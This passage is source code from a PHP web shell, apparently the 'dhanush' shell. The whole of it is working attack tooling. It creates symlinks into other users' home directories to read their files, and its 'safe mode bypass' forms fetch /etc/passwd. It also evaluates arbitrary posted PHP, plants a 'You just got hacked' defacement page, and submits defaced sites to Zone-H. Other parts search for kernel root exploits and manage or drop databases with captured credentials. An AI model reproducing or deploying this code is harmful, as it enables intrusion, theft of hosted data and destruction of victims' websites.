2028                     if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2029                     continue;
2030                     echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2031                     echo "<td align=center><font class=txt><a href=/dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2032                     $dcount++;
2033                     }
2034                     fclose($file);
2035                     
2036                     echo "</table>";
2037                     }
2038                     else
2039                     {
2040                     if($os != "Windows")
2041                     {
2042                     @mkdir("dhanush",0777);
2043                     @chdir("dhanush");
2044                     execmd("ln -s / root");
2045                     $file3 = 'Options all
2046                     DirectoryIndex Sux.html
2047                     AddType text/plain .php
2048                     AddHandler server-parsed .php
2049                     AddType text/plain .html
2050                     AddHandler txt .html
2051                     Require None
2052                     Satisfy Any
2053                     ';
2054                     $fp3 = fopen('.htaccess','w');
2055                     $fw3 = fwrite($fp3,$file3);
2056                     @fclose($fp3);
2057                     
2058                     echo "<table align=center border=1 style='width:40%;border-color:#333333;'><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";
2059                     
2060                     $temp = "";
2061                     $val1 = 0;
2062                     $val2 = 1000;
2063                     for(;$val1 <= $val2;$val1++)
2064                     {
2065                     $uid = @posix_getpwuid($val1);
2066                     if ($uid)
2067                     $temp .= join(':',$uid)."
2068                     ";
2069                     }
2070                     echo '<br/>';
2071                     $temp = trim($temp);
2072                     
2073                     $file5 = fopen("test.txt","w");
2074                     fputs($file5,$temp);
2075                     fclose($file5);
2076                     
2077                     $dcount = 1;
2078                     $file = fopen("test.txt", "r") or exit("Unable to open file!");
2079                     while(!feof($file))
2080                     {
2081                     $s = fgets($file);
2082                     $matches = array();
2083                     $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2084                     $matches = str_replace("home/","",$matches[1]);
2085                     if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2086                     continue;
2087                     echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2088                     echo "<td align=center><font class=txt><a href=/dhanush/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2089                     $dcount++;
2090                     }
2091                     fclose($file);
2092                     echo "</table>";
2093                     unlink("test.txt");
2094                     }
2095                     else
2096                     echo "<center><font size=4>Cannot create Symlink</font></center>";
2097                     }
2098                     }
2099                     }
2100                     else if(isset($_GET["symlinkfile"]))
2101                     {
2102                     if(!isset($_GET['file']))
2103                     {
2104                     ?>
2105                     <center>
2106                     <form action="<?php echo $self; ?>">
2107                     <input type="hidden" name="symlinkserver">
2108                     <input type="hidden" name="symlinkfile">
2109                     <input type="text" class="box" name="file" size="50" value="">
2110                     <input type="submit" value="Create Symlink" class="but">
2111                     </form></center>
2112                     <br><br>
2113                     <?php
2114                     }
2115                     else
2116                     {
2117                     $fakedir="cx";
2118                     $fakedep=16;
2119                     
2120                     $num=0; // offset of symlink.$num
2121                     
2122                     if(!empty($_GET['file'])) $file=$_GET['file'];
2123                     else if(!empty($_POST['file'])) $file=$_POST['file'];
2124                     else $file="";
2125                     
2126                     if(empty($file))
2127                     exit;
2128                     
2129                     if(!is_writable("."))
2130                     die("not writable directory");
2131                     
2132                     $level=0;
2133                     
2134                     for($as=0;$as<$fakedep;$as++){
2135                     if(!file_exists($fakedir))
2136                     mkdir($fakedir);
2137                     chdir($fakedir);
2138                     }
2139                     
2140                     while(1<$as--) chdir("..");
2141                     
2142                     $hardstyle = explode("/", $file);
2143                     
2144                     for($a=0;$a<count($hardstyle);$a++){
2145                     if(!empty($hardstyle[$a])){
2146                     if(!file_exists($hardstyle[$a]))
2147                     mkdir($hardstyle[$a]);
2148                     chdir($hardstyle[$a]);
2149                     $as++;
2150                     }
2151                     }
2152                     $as++;
2153                     while($as--)
2154                     chdir("..");
2155                     
2156                     @rmdir("fakesymlink");
2157                     @unlink("fakesymlink");
2158                     
2159                     @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
2160                     
2161                     // this loop will skip allready created symlinks.
2162                     while(1)
2163                     if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
2164                     else $num++;
2165                     
2166                     @unlink("fakesymlink");
2167                     mkdir("fakesymlink");
2168                     
2169                     die('<FONT class=txt>check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');
2170                     
2171                     }
2172                     }
2173                     else if(isset($_REQUEST["script"]))
2174                     {
2175                     ?>
2176                     <center><table><tr><td><a href="<?php echo $self; ?>?manually&script&symlinkserver"><font class="tblheads">| Do It Manually |</font></a></td>
2177                     <td><a href="<?php echo $self; ?>?automatic&script&symlinkserver"><font class="tblheads">| Do It Automatically |</font></a></td>
2178                     </tr></table></center>
2179                     <?php
2180                     if(isset($_REQUEST['manually']))
2181                     {
2182                     if(!isset($_REQUEST['passwd']))
2183                     {
2184                     ?>
2185                     <center>
2186                     <form action="<?php echo $self; ?>" method="post">
2187                     <input type="hidden" name="manually">
2188                     <input type="hidden" name="script">
2189                     <input type="hidden" name="symlinkserver">
2190                     <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2191                     <input type="submit" value="Get Config" class="but">
2192                     </form>
2193                     </center>
2194                     <?php
2195                     }
2196                     else
2197                     {
2198                     $getetc = trim($_REQUEST['passwd']);
2199                     
2200                     mkdir("dhanushSPT");
2201                     chdir("dhanushSPT");
2202                     
2203                     $myfile = fopen("test.txt","w");
2204                     fputs($myfile,$getetc);
2205                     fclose($myfile);
2206                     
2207                     $file = fopen("test.txt", "r") or exit("Unable to open file!");
2208                     while(!feof($file))
2209                     {
2210                     $s = fgets($file);
2211                     $matches = array();
2212                     $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2213                     $matches = str_replace("home/","",$matches[1]);
2214                     if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2215                     continue;
2216                     syml($matches,$matches);
2217                     }
2218                     fclose($file);
2219                     unlink("test.txt");
2220                     echo "<center><font class=txt>[ Done ]</font></center>";
2221                     echo "<br><center><a href=dhanushSPT target=_blank><font class=txt>| Go Here |</font></a></center>";
2222                     }
2223                     }
2224                     else if(isset($_REQUEST['automatic']))
2225                     {
2226                     $d0mains = @file("/etc/named.conf");
2227                     
2228                     if($d0mains)
2229                     {
2230                     mkdir("dhanushST");
2231                     chdir("dhanushST");
2232                     
2233                     foreach($d0mains as $d0main)
2234                     {
2235                     if(eregi("zone",$d0main))
2236                     {
2237                     preg_match_all('#zone "(.*)"#', $d0main, $domains);
2238                     flush();
2239                     
2240                     if(strlen(trim($domains[1][0])) > 2)
2241                     {
2242                     $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2243                     
2244                     syml($user['name'],$domains[1][0]);
2245                     }
2246                     }
2247                     }
2248                     echo "<center><font class=txt>[ Done ]</font></center>";
2249                     echo "<br><center><a href=dhanushST target=_blank><font class=txt>| Go Here |</font></a></center>";
2250                     }
2251                     else
2252                     {
2253                     mkdir("dhanushSPT");
2254                     chdir("dhanushSPT");
2255                     $temp = "";
2256                     $val1 = 0;
2257                     $val2 = 1000;
2258                     for(;$val1 <= $val2;$val1++)
2259                     {
2260                     $uid = @posix_getpwuid($val1);
2261                     if ($uid)
2262                     $temp .= join(':',$uid)."
2263                     ";
2264                     }
2265                     echo '<br/>';
2266                     $temp = trim($temp);
2267                     
2268                     $file5 = fopen("test.txt","w");
2269                     fputs($file5,$temp);
2270                     fclose($file5);
2271                     
2272                     $file = fopen("test.txt", "r") or exit("Unable to open file!");
2273                     while(!feof($file))
2274                     {
2275                     $s = fgets($file);
2276                     $matches = array();
2277                     $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2278                     $matches = str_replace("home/","",$matches[1]);
2279                     if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2280                     continue;
2281                     syml($matches,$matches);
2282                     }
2283                     fclose($file);
2284                     echo "</table>";
2285                     unlink("test.txt");
2286                     echo "<center><font class=txt>[ Done ]</font></center>";
2287                     echo "<br><center><a href=dhanushSPT target=_blank><font class=txt>| Go Here |</font></a></center>";
2288                     }
2289                     }
2290                     }
2291                     }
2292                     
2293                     // Exploit Search
2294                     else if(isset($_GET["exploit"]))
2295                     {
2296                     if(!isset($_GET["rootexploit"]))
2297                     {
2298                     ?>
2299                     <center>
2300                     <form action="<?php echo $self; ?>" method="get" target="_blank">
2301                     <input type="hidden" name="exploit">
2302                     <table border="1" cellpadding="5" cellspacing="4" style="width:50%;">
2303                     <tr>
2304                     <td style="height:60px;">
2305                     <font size="4">Select Website</font></td><td>
2306                     <p><select id="rootexploit" name="rootexploit" class="box">
2307                     <option value="exploit-db">Exploit-db</option>
2308                     <option value="packetstormsecurity">Packetstormsecurity</option>
2309                     <option value="exploitsearch">Exploitsearch</option>
2310                     <option value="shodanhq">Shodanhq</option>
2311                     </select></p></td></tr><tr><td colspan="2" align="center"  style="height:40px;">
2312                     <input type="submit" value="Search" class="but"></td></tr></table>
2313                     </form></center><br>
2314                     
2315                     <?php
2316                     }
2317                     else
2318                     {
2319                     //exploit search
2320                     $Lversion = php_uname(r);
2321                     $OSV = php_uname(s);
2322                     if(eregi('Linux',$OSV))
2323                     {
2324                     
2325                     $Lversion=substr($Lversion,0,6);
2326                     if($_GET['rootexploit'] == "exploit-db")
2327                     {
2328                     header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Linux+Kernel+$Lversion");
2329                     }
2330                     else if($_GET['rootexploit'] == "packetstormsecurity")
2331                     {
2332                     header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=Linux+Kernel+$Lversion");
2333                     }
2334                     else if($_GET['rootexploit'] == "exploitsearch")
2335                     {
2336                     header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
2337                     }
2338                     else if($_GET['rootexploit'] == "shodanhq")
2339                     {
2340                     header("Location:http://www.shodanhq.com/exploits?q=Linux+Kernel+$Lversion");
2341                     }
2342                     }
2343                     else
2344                     {
2345                     $Lversion=substr($Lversion,0,3);
2346                     if($_GET['rootexploit'] == "exploit-db")
2347                     {
2348                     header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV+Lversion");
2349                     }
2350                     else if($_GET['rootexploit'] == "packetstormsecurity")
2351                     {
2352                     header("Location:http://www2.packetstormsecurity.org/cgi-bin/search/search.cgi?searchvalue=$OSV+Lversion");
2353                     }
2354                     else if($_GET['rootexploit'] == "exploitsearch")
2355                     {
2356                     header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
2357                     }
2358                     else if($_GET['rootexploit'] == "shodanhq")
2359                     {
2360                     header("Location:http://www.shodanhq.com/exploits?q=$OSV+Lversion");
2361                     }
2362                     }
2363                     //End of Exploit search
2364                     }
2365                     }
2366                     
2367                     else if(isset($_REQUEST['404']))
2368                     {
2369                     ?>
2370                     <center><table><tr><td><a href="<?php echo $self; ?>?404&new"><font size="4">| Set Your 404 Page |</font></a></td>
2371                     <td><a href="<?php echo $self; ?>?404&old"><font size="4">| Set Specified 404 Page |</font></a></td>
2372                     </tr></table></center><br>
2373                     <?php
2374                     if(isset($_GET['old']))
2375                     {
2376                     if(strlen($ind) != 0)
2377                     {
2378                     $myfile = fopen(".htaccess", "a");
2379                     fwrite($myfile, "ErrorDocument 404 /404.html
2380                     ");
2381                     
2382                     $myfilee = fopen("404.html", "w+");
2383                     fwrite($myfilee, base64_decode($ind));
2384                     
2385                     fclose($myfile);
2386                     header("Location:$self?set404");
2387                     ob_end_flush();
2388                     }
2389                     else
2390                     echo "<center>Nothing Specified in the shell</center>";
2391                     }
2392                     else if(isset($_REQUEST['new']))
2393                     {
2394                     if(strlen($ind) != 0)
2395                     {
2396                     if($myfile = fopen(".htaccess", "a"))
2397                     {
2398                     fwrite($myfile, "ErrorDocument 404 /404.html
2399                     ");
2400                     
2401                     if($myfilee = fopen("404.html", "w+"))
2402                     {
2403                     fwrite($myfilee, base64_decode($ind));
2404                     
2405                     fclose($myfilee);
2406                     header("Location:$self?set404");
2407                     ob_end_flush();
2408                     }
2409                     fclose($myfile);
2410                     }
2411                     else
2412                     {
2413                     header("Location:$self?cannotset404");
2414                     ob_end_flush();
2415                     }
2416                     }
2417                     else
2418                     {
2419                     ?>
2420                     <form method=post>
2421                     <center><textarea name=message cols=100 rows=18 class=box>lol! You just got hacked</textarea></br>
2422                     <input type="submit" name=404page value="  Save  " class=but></center>
2423                     </br>
2424                     </form>
2425                     <?php
2426                     }
2427                     }
2428                     }
2429                     
2430                     else if(isset($_POST["SendNowToZoneH"]))
2431                     {
2432                     $hacker = $_POST['defacer'];
2433                     $method = $_POST['hackmode'];
2434                     $neden = $_POST['reason'];
2435                     $site = $_POST['domain'];
2436                     
2437                     if (empty($hacker))
2438                     {
2439                     die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
2440                     }
2441                     elseif($method == "--------SELECT--------")
2442                     {
2443                     die("<center><font size=3>[-] You Must Select The Method !</center>");
2444                     }
2445                     elseif($neden == "--------SELECT--------")
2446                     {
2447                     die("<center><font size=3>[-] You Must Select The Reason</center>");
2448                     }
2449                     elseif(empty($site))
2450                     {
2451                     die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
2452                     }
2453                     
2454                     $i = 0;
2455                     $sites = explode("
2456                     ", $site);
2457                     echo "<pre class=ml1 style='margin-top:5px'>";
2458                     while($i < count($sites))
2459                     {
2460                     if(substr($sites[$i], 0, 4) != "http")
2461                     {
2462                     $sites[$i] = "http://".$sites[$i];
2463                     }
2464                     ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
2465                     echo "<font class=txt>Site : ".$sites[$i]." Posted !</font><br>";
2466                     ++$i;
2467                     }
2468                     
2469                     echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
2470                     }
2471                     
2472                     // Bypass
2473                     else if (isset($_GET["bypass"]))
2474                     {
2475                     if(isset($_GET['copy']))
2476                     {
2477                     if(@copy($_GET['copy'],"test1.php"))
2478                     {
2479                     $fh=fopen("test1.php",'r');
2480                     echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea></br></br>";
2481                     @fclose($fh);
2482                     unlink("test1.php");
2483                     }
2484                     }
2485                     else if(isset($_GET['imap']))
2486                     {
2487                     $string = $_GET['imap'];
2488                     echo "<textarea cols=120 rows=20 class=box readonly>";
2489                     $stream = imap_open($string, "", "");
2490                     $str = imap_body($stream, 1);
2491                     echo "</textarea>";
2492                     }
2493                     else if(isset($_GET['sql']))
2494                     {
2495                     echo "<textarea cols=120 rows=20 class=box readonly>";
2496                     $file=$_GET['ssql'];
2497                     
2498                     
2499                     $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
2500                     $mysql_files = explode(':', $mysql_files_str);
2501                     
2502                     $sql = array (
2503                     "USE $mdb",
2504                     'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
2505                     "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
2506                     . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
2507                     . "ESCAPED BY          '' "
2508                     . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
2509                     
2510                     "SELECT a FROM $tbl LIMIT 1"
2511                     );
2512                     mysql_connect ($mhost, $muser, $mpass);
2513                     
2514                     foreach ($sql as $statement) {
2515                     $q = mysql_query ($statement);
2516                     
2517                     if ($q == false) die (
2518                     "FAILED: " . $statement . "
2519                     " .
2520                     "REASON: " . mysql_error () . "
2521                     "
2522                     );
2523                     
2524                     if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
2525                     
2526                     echo htmlspecialchars($r[0]);
2527                     mysql_free_result ($q);
2528                     }
2529                     echo "</textarea>";
2530                     }
2531                     else if(isset($_GET['curl']))
2532                     {
2533                     $ch=curl_init("file://" . $_GET[curl]);
2534                     curl_setopt($ch,CURLOPT_HEADERS,0);
2535                     curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
2536                     $file_out=curl_exec($ch);
2537                     curl_close($ch);
2538                     echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea></br></br>";
2539                     }
2540                     else if(isset($_GET['include']))
2541                     {
2542                     if(file_exists($_GET['include']))
2543                     {
2544                     echo "<textarea cols=120 rows=20 class=box readonly>";
2545                     @include($_GET['include']);
2546                     echo "</textarea>";
2547                     }
2548                     else
2549                     echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
2550                     }
2551                     else if(isset($_GET['id']))
2552                     {
2553                     echo "<textarea cols=120 rows=20 class=box readonly>";
2554                     for($uid=0;$uid<60000;$uid++)
2555                     {   //cat /etc/passwd
2556                     $ara = posix_getpwuid($uid);
2557                     if (!empty($ara))
2558                     {
2559                     while (list ($key, $val) = each($ara))
2560                     {
2561                     print "$val:";
2562                     }
2563                     print "
2564                     ";
2565                     }
2566                     }
2567                     echo "</textarea>";
2568                     break;
2569                     }
2570                     else if(isset($_GET['tempname']))
2571                     {
2572                     tempnam("/home/" . $_GET['tempname']);
2573                     }
2574                     else if(isset($_GET['sym']))
2575                     {
2576                     echo "<textarea cols=120 rows=20 class=box readonly>";
2577                     $fp = fopen("hack15.txt","w+");
2578                     fwrite($fp,"Php Hacker Was Here");
2579                     @unlink($flib);
2580                     $sym = "/home/" . $them . "/public_html/" . $k;
2581                     $link = "/home/"  . $you . "/public_html/" . $folder . "/" . $flib;
2582                     @symlink($sym, $link);
2583                     if ($k{0} == "/")
2584                     {
2585                     echo "<script> window.location = '" . $flib . "'</script>";
2586                     }
2587                     else
2588                     {
2589                     echo "<pre><xmp>";
2590                     echo readlink($flib) . "
2591                     ";
2592                     echo "Filesize: " . linkinfo($flib) . "B
2593                     
2594                     ";
2595                     echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/"  . $folder . "/" . $flib);
2596                     echo "</textarea>";
2597                     }
2598                     }
2599                     else
2600                     {
2601                     ?>
2602                     
2603                     <table cellpadding="7" align="center" border="3" style="width:70%;" class="pwdtbl">
2604                     <tr>
2605                     <td align="center" colspan="2"><font size="4">Safe mode bypass</font></td>
2606                     </tr>
2607                     <tr>
2608                     <td align="center">
2609                     <p>Using copy() function</p>
2610                     <form action="<?php echo $self; ?>" method="get">
2611                     <input type="hidden" name="bypass">
2612                     <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2613                     </form>
2614                     </td>
2615                     <td align="center">
2616                     <p>Using imap() function</p>
2617                     <form action="<?php echo $self; ?>" method="get">
2618                     <input type="hidden" name="bypass">
2619                     <input type="text" name="imap" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2620                     </form>
2621                     </td>
2622                     </tr>
2623                     
2624                     <tr>
2625                     <td align="center">
2626                     <p>Using sql() function</p>
2627                     <form action="<?php echo $self; ?>" method="get">
2628                     <input type="hidden" name="bypass">
2629                     <input type="text" name="sql" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2630                     </form>
2631                     </td>
2632                     <td align="center">
2633                     <p>Using Curl() function</p>
2634                     <form action="<?php echo $self; ?>" method="get">
2635                     <input type="hidden" name="bypass">
2636                     <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2637                     </form>
2638                     </td>
2639                     </tr>
2640                     
2641                     <tr>
2642                     <td align="center">
2643                     <p>Bypass using include()</p>
2644                     <form action="<?php echo $self; ?>" method="get">
2645                     <input type="hidden" name="bypass">
2646                     <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2647                     </form>
2648                     </td>
2649                     <td align="center">
2650                     <p>Using id() function</p>
2651                     <form action="<?php echo $self; ?>" method="get">
2652                     <input type="hidden" name="bypass">
2653                     <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2654                     </form>
2655                     </td>
2656                     </tr>
2657                     
2658                     <tr>
2659                     <td align="center">
2660                     <p>Using tempnam() function</p>
2661                     <form action="<?php echo $self; ?>" method="get">
2662                     <input type="hidden" name="bypass">
2663                     <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2664                     </form>
2665                     </td>
2666                     <td align="center">
2667                     <p>Using symlink() function</p>
2668                     <form action="<?php echo $self; ?>" method="get">
2669                     <input type="hidden" name="bypass">
2670                     <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="submit" value="bypass" class="but">
2671                     </form>
2672                     </td>
2673                     </tr>
2674                     </table>
2675                     </form>
2676                     <?php
2677                     }
2678                     }
2679                     else if (isset($_GET["phpc"]))
2680                     {
2681                     // If the comand was sent
2682                     if(isset($_POST['code'])&& $_POST['code'] && isset($_POST['intext'])&& $_POST['intext'] == "disp")
2683                     {
2684                     // FIlter Some Chars we dont need
2685                     ?><br>
2686                     <textarea name="code" class="box" cols="120" rows="10"><?php
2687                     $code = str_replace("<?php","",$_POST['code']);
2688                     $code = str_replace("<?","",$code);
2689                     $code = str_replace("?>","",$code);
2690                     
2691                     // Evaluate PHP CoDE!
2692                     htmlspecialchars(eval($code));
2693                     ?>
2694                     </textarea><?php
2695                     }
2696                     else if(isset($_POST['code'])&& $_POST['code'] && !isset($_POST['intext']))
2697                     {
2698                     $code = str_replace("<?php","",$_POST['code']);
2699                     $code = str_replace("<?","",$code);
2700                     $code = str_replace("?>","",$code);
2701                     
2702                     // Evaluate PHP CoDE!
2703                     ?><br><font size="4">Result of execution this PHP-code :</font><br><font class="txt" size="3"><?php htmlspecialchars(eval($code)); ?></font><?php
2704                     }
2705                     ?>
2706                     <form method="POST">
2707                     <textarea name="code" class="box" cols="120" rows="10"><?php if(isset($_POST['code'])) { echo $_POST['code']; } else { ?>phpinfo();<?php } ?></textarea>
2708                     <br /><br />
2709                     <input name="submit" value="Execute This COde! " class="but" type="submit" />
2710                     <input type="checkbox" name="intext" value="disp"> <font class="txt" size="3">Display in Textarea</font>
2711                     </form>
2712                     <?php
2713                     }
2714                     
2715                     
2716                     else if(isset($_GET['database']))
2717                     { ?>
2718                     <form action=<?php echo $self; ?> method="POST">
2719                     <table style="width:90%;" cellpadding="4" align="center">
2720                     <tr>
2721                     <td colspan="2">Connect To Database</td>
2722                     </tr>
2723                     <tr>
2724                     <td>Server Address :</td>
2725                     <td><input type="text" class="box" name="server" value="localhost"></td>
2726                     <!--<td rowspan="4"><textarea name="query" cols="60" rows="7" class="box">SHOW DATABASE</textarea>-->
2727                     </tr>
2728                     <tr>
2729                     <td>Username :</td>
2730                     <td><input type="text" class="box" name="username" value="root"></td>
2731                     </tr>
2732                     <tr>
2733                     <td>Password:</td>
2734                     <td><input type="text" class="box" name="password" value=""></td>
2735                     </tr>
2736                     
2737                     <tr>
2738                     <td></td>
2739                     <td><input type="submit" value="  Connect  " name="executeit" class="but"></td>
2740                     </tr>
2741                     </table>
2742                     </form>
2743                     <?php
2744                     }
2745                     // Execute Query
2746                     else if(isset($_POST["executeit"]))
2747                     {
2748                     if(isset($_POST['username'])  && isset($_POST['server']))
2749                     {
2750                     $dbserver = $_POST['server'];
2751                     $dbuser = $_POST['username'];
2752                     $dbpass = $_POST['password'];
2753                     
2754                     setcookie("dbserver", $dbserver);
2755                     setcookie("dbuser", $dbuser);
2756                     setcookie("dbpass", $dbpass);
2757                     header("Location:$self?data");
2758                     
2759                     }
2760                     }
2761                     else if(isset($_GET['data']))
2762                     {
2763                     listdatabase();
2764                     }
2765                     else if(isset($_GET['viewdb']))
2766                     {
2767                     listdatabase();
2768                     }
2769                     
2770                     else if(isset($_GET['action']) && isset($_GET['dbname']))
2771                     {
2772                     if($_GET['action'] == "createDB")
2773                     {
2774                     $dbname = $_GET['dbname'];
2775                     $dbserver = $_COOKIE["dbserver"];
2776                     $dbuser = $_COOKIE["dbuser"];
2777                     $dbpass = $_COOKIE["dbpass"];
2778                     $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2779                     mysql_query("create database $dbname",$mysqlHandle);
2780                     listdatabase();
2781                     }
2782                     if($_GET['action'] == 'dropDB')
2783                     {
2784                     $dbname = $_GET['dbname'];
2785                     $dbserver = $_COOKIE["dbserver"];
2786                     $dbuser = $_COOKIE["dbuser"];
2787                     $dbpass = $_COOKIE["dbpass"];
2788                     $mysqlHandle = mysql_connect($dbserver, $dbuser, $dbpass);
2789                     mysql_query("drop database $dbname",$mysqlHandle);
2790                     mysql_close($mysqlHandle);
2791                     listdatabase();
2792                     }
2793                     if($_GET['action'] == 'listTables')
2794                     {
2795                     listtable();
2796                     }
2797                     
2798                     // Create Tables
2799                     if($_GET['action'] == "createtable")
2800                     {
2801                     $dbserver = $_COOKIE["dbserver"];
2802                     $dbuser = $_COOKIE["dbuser"];
2803                     $dbpass = $_COOKIE["dbpass"];
2804                     $dbname = $_GET['dbname'];
2805                     $tablename = $_GET['tablename'];
2806                     $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2807                     mysql_select_db($dbname);
2808                     mysql_query("CREATE TABLE $tablename ( no INT )");
2809                     listtable();
2810                     }
2811                     
2812                     // Drop Tables
2813                     if($_GET['action'] == "dropTable")
2814                     {
2815                     $dbserver = $_COOKIE["dbserver"];
2816                     $dbuser = $_COOKIE["dbuser"];
2817                     $dbpass = $_COOKIE["dbpass"];
2818                     $dbname = $_GET['dbname'];
2819                     $tablename = $_GET['tablename'];
2820                     $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2821                     mysql_select_db($dbname);
2822                     mysql_query("drop table $tablename");
2823                     listtable();
2824                     }
2825                     
2826                     // Empty Tables
2827                     if($_GET['action'] == "empty")
2828                     {
2829                     $dbserver = $_COOKIE["dbserver"];
2830                     $dbuser = $_COOKIE["dbuser"];
2831                     $dbpass = $_COOKIE["dbpass"];
2832                     $dbname = $_GET['dbname'];
2833                     $tablename = $_GET['tablename'];
2834                     $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2835                     mysql_select_db($dbname);
2836                     mysql_query("delete from $tablename");
2837                     listtable();
2838                     }
2839                     
2840                     // Empty Tables
2841                     if($_GET['action'] == "dropField")
2842                     {
2843                     $dbserver = $_COOKIE["dbserver"];
2844                     $dbuser = $_COOKIE["dbuser"];
2845                     $dbpass = $_COOKIE["dbpass"];
2846                     $dbname = $_GET['dbname'];
2847                     $tablename = $_GET['tablename'];
2848                     $fieldname = $_GET['fieldname'];
2849                     $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2850                     mysql_select_db($dbname);
2851                     $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
2852                     mysql_select_db( $dbname, $mysqlHandle );
2853                     mysql_query( $queryStr , $mysqlHandle );
2854                     listtable();
2855                     }
2856                     
2857                     // View Table Schema
2858                     if($_GET['action'] == "viewSchema")
2859                     {
2860                     $dbserver = $_COOKIE["dbserver"];
2861                     $dbuser = $_COOKIE["dbuser"];
2862                     $dbpass = $_COOKIE["dbpass"];
2863                     $dbname = $_GET['dbname'];
2864                     $tablename = $_GET['tablename'];
2865                     $mysqlHandle = mysql_connect ($dbserver, $dbuser, $dbpass);
2866                     mysql_select_db($dbname);
2867                     echo "<br><div><font size=3>[ $dbname ]</font> - <font size=3>></font> <a href=$self?viewdb&dbname=$dbname> <font size=3>Database List</font> </a> <font size=3>></font> <a href=$self?action=listTables&dbname=$dbname&tablename=$tablename> <font size=3>Table List</font> </a> &nbsp; <a href=$self?logoutdb> <font class=txt size=3>[ Log Out ]</font> </a></div>";
2868                     $pResult = mysql_query( "SHOW fields FROM $tablename" );
2869                     $num = mysql_num_rows( $pResult );
2870                     echo "<br><br><table align=center class=pwdtbl style='width:80%;' border=1>";
2871                     echo "<th>Field</th><th>Type</th><th>Null</th><th>Key</th></th>";
2872                     for( $i = 0; $i < $num; $i++ )
2873                     {
2874                     $field = mysql_fetch_array( $pResult );
2875                     echo "<tr>
2876                     ";
2877                     echo "<td>".$field["Field"]."</td>
2878                     ";
2879                     echo "<td>".$field["Type"]."</td>
2880                     ";
2881                     echo "<td>".$field["Null"]."</td>
2882                     ";
2883                     echo "<td>".$field["Key"]."</td>
2884                     ";
2885                     echo "<td>".$field["Default"]."</td>
2886                     ";
2887                     echo "<td>".$field["Extra"]."</td>
2888                     ";
